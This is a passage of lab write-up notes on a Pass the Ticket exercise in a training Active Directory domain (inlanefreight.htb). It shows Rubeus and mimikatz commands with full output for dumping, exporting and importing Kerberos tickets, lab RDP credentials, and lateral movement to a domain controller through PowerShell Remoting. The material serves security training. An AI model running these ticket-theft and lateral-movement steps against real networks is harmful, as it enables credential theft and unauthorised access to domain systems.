PS C:\Users\john\Documents> whoami inlanefreight\john [DC01]: PS C:\Users\john\Documents> hostname DC01 [DC01]: PS C:\Users\john\Documents> ``` ## Rubeus - PowerShell Remoting with Pass the Ticket Rubeus has the option `createnetonly`, which creates a sacrificial process/logon session ([Logon type 9](https://eventlogxp.com/blog/logon-type-what-does-it-mean/)). The process is hidden by default, but we can specify the flag `/show` to display the process, and the result is the equivalent of `runas /netonly`. This prevents the erasure of existing TGTs for the current logon session. ### **Create a sacrificial process with Rubeus** ```cmd-session C:\tools> Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.3 [*] Action: Create process (/netonly) [*] Using random username and password. [*] Showing process : True [*] Username : JMI8CL7C [*] Domain : DTCDV6VL [*] Password : MRWI6XGI [+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 1556 [+] LUID : 0xe07648 ``` The above command will open a new cmd window. From that window, we can execute Rubeus to request a new TGT with the option `/ptt` to import the ticket into our current session and connect to the DC using PowerShell Remoting. ### **Rubeus - Pass the Ticket for lateral movement** ```cmd-session C:\tools> Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.3 [*] Action: Ask TGT [*] Using aes256_cts_hmac_sha1 hash: 9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc [*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\john' [*] Using domain controller: 10.129.203.120:88 [+] TGT request successful! [*] Base64(ticket.kirbi): doIFqDCCBaSgAwIBBaEDAgEWooIEojCCBJ5hggSaMIIElqADAgEFoRMbEUlOTEFORUZSRUlHSFQuSFRC oiYwJKADAgECoR0wGxsGa3JidGd0GxFpbmxhbmVmcmVpZ2h0Lmh0YqOCBFAwggRMoAMCARKhAwIBAqKC BD4EggQ6JFh+c/cFI8UqumM6GPaVpUhz3ZSyXZTIHiI/b3jOFtjyD/uYTqXAAq2CkakjomzCUyqUfIE5 +2dvJYclANm44EvqGZlMkFvHK40slyFEK6E6d7O+BWtGye2ytdJr9WWKWDiQLAJ97nrZ9zhNCfeWWQNQ dpAEeCZP59dZeIUfQlM3+/oEvyJBqeR6mc3GuicxbJA743TLyQt8ktOHU0oIz0oi2p/VYQfITlXBmpIT OZ6+/vfpaqF68Y/5p61V+B8XRKHXX2JuyX5+d9i3VZhzVFOFa+h5+efJyx3kmzFMVbVGbP1DyAG1JnQO h1z2T1egbKX/Ola4unJQRZXblwx+xk+MeX0IEKqnQmHzIYU1Ka0px5qnxDjObG+Ji795TFpEo04kHRwv zSoFAIWxzjnpe4J9sraXkLQ/btef8p6qAfeYqWLxNbA+eUEiKQpqkfzbxRB5Pddr1TEONiMAgLCMgphs gVMLj6wtH+gQc0ohvLgBYUgJnSHV8lpBBc/OPjPtUtAohJoas44DZRCd7S9ruXLzqeUnqIfEZ/DnJh3H SYtH8NNSXoSkv0BhotVXUMPX1yesjzwEGRokLjsXSWg/4XQtcFgpUFv7hTYTKKn92dOEWePhDDPjwQmk H6MP0BngGaLK5vSA9AcUSi2l+DSaxaR6uK1bozMgM7puoyL8MPEhCe+ajPoX4TPn3cJLHF1fHofVSF4W nkKhzEZ0wVzL8PPWlsT+Olq5TvKlhmIywd3ZWYMT98kB2igEUK2G3jM7XsDgwtPgwIlP02bXc2mJF/VA qBzVwXD0ZuFIePZbPoEUlKQtE38cIumRyfbrKUK5RgldV+wHPebhYQvFtvSv05mdTlYGTPkuh5FRRJ0e WIw0HWUm3u/NAIhaaUal+DHBYkdkmmc2RTWk34NwYp7JQIAMxb68fTQtcJPmLQdWrGYEehgAhDT2hX+8 VMQSJoodyD4AEy2bUISEz6x5gjcFMsoZrUmMRLvUEASB/IBW6pH+4D52rLEAsi5kUI1BHOUEFoLLyTNb 4rZKvWpoibi5sHXe0O0z6BTWhQceJtUlNkr4jtTTKDv1sVPudAsRmZtR2GRr984NxUkO6snZo7zuQiud 7w2NUtKwmTuKGUnNcNurz78wbfild2eJqtE9vLiNxkw+AyIr+gcxvMipDCP9tYCQx1uqCFqTqEImOxpN BqQf/MDhdvked+p46iSewqV/4iaAvEJRV0lBHfrgTFA3HYAhf062LnCWPTTBZCPYSqH68epsn4OsS+RB gwJFGpR++u1h//+4Zi++gjsX/+vD3Tx4YUAsMiOaOZRiYgBWWxsI02NYyGSBIwRC3yGwzQAoIT43EhAu HjYiDIdccqxpB1+8vGwkkV7DEcFM1XFwjuREzYWafF0OUfCT69ZIsOqEwimsHDyfr6WhuKua034Us2/V 8wYbbKYjVj+jgfEwge6gAwIBAKKB5gSB432B4DCB3aCB2jCB1zCB1KArMCmgAwIBEqEiBCDlV0Bp6+en HH9/2tewMMt8rq0f7ipDd/UaU4HUKUFaHaETGxFJTkxBTkVGUkVJR0hULkhUQqIRMA+gAwIBAaEIMAYb BGpvaG6jBwMFAEDhAAClERgPMjAyMjA3MTgxMjQ0NTBaphEYDzIwMjIwNzE4MjI0NDUwWqcRGA8yMDIy MDcyNTEyNDQ1MFqoExsRSU5MQU5FRlJFSUdIVC5IVEKpJjAkoAMCAQKhHTAbGwZrcmJ0Z3QbEWlubGFu ZWZyZWlnaHQuaHRi [+] Ticket successfully imported! ServiceName : krbtgt/inlanefreight.htb ServiceRealm : INLANEFREIGHT.HTB UserName : john UserRealm : INLANEFREIGHT.HTB StartTime : 7/18/2022 5:44:50 AM EndTime : 7/18/2022 3:44:50 PM RenewTill : 7/25/2022 5:44:50 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : 5VdAaevnpxx/f9rXsDDLfK6tH+4qQ3f1GlOB1ClBWh0= ASREP (key) : 9279BCBD40DB957A0ED0D3856B2E67F9BB58E6DC7FC07207D0763CE2713F11DC c:\tools>powershell Windows PowerShell Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\tools> Enter-PSSession -ComputerName DC01 [DC01]: PS C:\Users\john\Documents> whoami inlanefreight\john [DC01]: PS C:\Users\john\Documents> hostname DC01 ``` *** ### Lab - Questions > RDP to with user "Administrator" and password "AnotherC0mpl3xP4$$" * Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect? Firstly, connect via rdp to the ip and execute mimikatz --> ``` xfreerdp /v:10.129.180.72 /u:Administrator /p:AnotherC0mpl3xP4$$ /clipboard ``` ```c PS C:\tools> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ## \ / ## ( benjamin@gentilkiwi.com ) '## v ##' > https://blog.gentilkiwi.com/mimikatz '#####' Vincent LE TOUX ( vincent.letoux@gmail.com ) > https://pingcastle.com > https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export ... Group 0 - Ticket Granting Service -------------------------------- [00000000] Start/End/MaxRenew : 12/18/2025 3:48:26 PM ; 12/19/2025 1:47:27 AM ; 12/25/2025 3:47:27 PM Service Name (02) : cifs ; DC01.inlanefreight.htb ; @ INLANEFREIGHT.HTB Target Name (02) : cifs ; DC01.inlanefreight.htb ; @ INLANEFREIGHT.HTB Client Name (01) : MS01$ ; @ INLANEFREIGHT.HTB Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac e5fb921f189d90677ad1cd17acf8639de6efad873ba27ea7501128ee033298b0 Ticket : 0x00000012 - aes256_hmac ; kvno = 7 ; [...] * Saved to file : [0;3e4]-0-0-40a50000-MS01$@cifs-DC01.inlanefreight.htb.kirbi [00000001] Start/End/MaxRenew : 12/18/2025 3:47:29 PM ; 12/19/2025 1:47:27 AM ; 12/25/2025 3:47:27 PM Service Name (02) : DNS ; dc01.inlanefreight.htb ; @ INLANEFREIGHT.HTB Target Name (02) : DNS ; dc01.inlanefreight.htb ; @ INLANEFREIGHT.HTB Client Name (01) : MS01$ ; @ INLANEFREIGHT.HTB Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 8643425cf2c67d57efdc7978baa859d7a7a2e4411187833bf7636ec850d22630 Ticket : 0x00000012 - aes256_hmac ; kvno = 7 ; [...] * Saved to file : [0;3e4]-0-1-40a50000-MS01$@DNS-dc01.inlanefreight.htb.kirbi [00000002] Start/End/MaxRenew : 12/18/2025 3:47:27 PM ; 12/19/2025 1:47:27 AM ; 12/25/2025 3:47:27 PM Service Name (02) : GC ; DC01.inlanefreight.htb ; inlanefreight.htb ; @ INLANEFREIGHT.HTB Target Name (02) : GC ; DC01.inlanefreight.htb ; inlanefreight.htb ; @ INLANEFREIGHT.HTB Client Name (01) : MS01$ ; @ INLANEFREIGHT.HTB Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 4e32faf83a4ff274ae1a970d4f1cbd10a2897887758b5d99444759af1122d124 Ticket : 0x00000012 - aes256_hmac ; kvno = 7 ; [...] * Saved to file : [0;3e4]-0-2-40a50000-MS01$@GC-DC01.inlanefreight.htb.kirbi Group 1 - Client Ticket ----------------------- (No tickets) Group 2 - Ticket Granting Ticket -------------------------------- [00000000] Start/End/MaxRenew : 12/18/2025 3:47:29 PM ; 12/19/2025 1:47:27 AM ; 12/25/2025 3:47:27 PM Service Name (02) : krbtgt ; INLANEFREIGHT.HTB ; @ INLANEFREIGHT.HTB Target Name (--) : @ INLANEFREIGHT.HTB Client Name (01) : MS01$ ; @ INLANEFREIGHT.HTB ( $$Delegation Ticket$$ ) Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ; Session Key : 0x00000012 - aes256_hmac fa891f45f3a7bd379fee6a70985c87bd2ada1b8586a1be29700da38ebf70d808 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 ; [...] * Saved to file : [0;3e4]-2-0-60a10000-MS01$@krbtgt-INLANEFREIGHT.HTB.kirbi [00000001] Start/End/MaxRenew : 12/18/2025 3:47:27 PM ; 12/19/2025 1:47:27 AM ; 12/25/2025 3:47:27 PM Service Name (02) : krbtgt ; INLANEFREIGHT.HTB ; @ INLANEFREIGHT.HTB Target Name (02) : krbtgt ; inlanefreight.htb ; @ INLANEFREIGHT.HTB Client Name (01) : MS01$ ; @ INLANEFREIGHT.HTB ( inlanefreight.htb ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 4cff57d766d909ebd1740108c6c4057a8c609443dc6af12ad77fdbafb6fc62b3 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 ; [...] * Saved to file : [0;3e4]-2-1-40e10000-MS01$@krbtgt-INLANEFREIGHT.HTB.kirbi ``` * Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john Before export all tickets to this currenly folder, get the .kirbi of john and do a ptt -->
```powershell mimikatz.exe ``` ``` mimikatz # privilege::debug mimikatz # kerberos::ptt [0;6d473]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi * File: '[0;6d473]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi': OK mimikatz # exit ``` Now, into the same powershell execute `klist` to confirm the PTT and go to read the flag into \DC01.inlanefreight.htb\john ``` PS C:\tools> klist Current LogonId is 0:0x8ae9c Cached Tickets: (1) #0> Client: john @ INLANEFREIGHT.HTB Server: krbtgt/INLANEFREIGHT.HTB @ INLANEFREIGHT.HTB KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 : forwardable renewable initial pre_authent name_canonicalize Start Time : 12/18/2025 15:48:15 (local) End Time : 12/19/2025 01:48:15 (local) Renew Time : 12/25/2025 15:48:15 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags : 0x1 -> PRIMARY Kdc Called : PS C:\tools> type \\DC01.inlanefreight.htb\john\flag.txt ``` * Use john's TGT to perform a Pass the Ticket attack and connect to the DC01 using PowerShell Remoting. Read the flag from C:\john\john.txt ``` PS C:\tools> Enter-PSSession -ComputerName DC01.inlanefreight.htb [DC01.inlanefreight.htb]: PS C:\Users\john\Documents> ```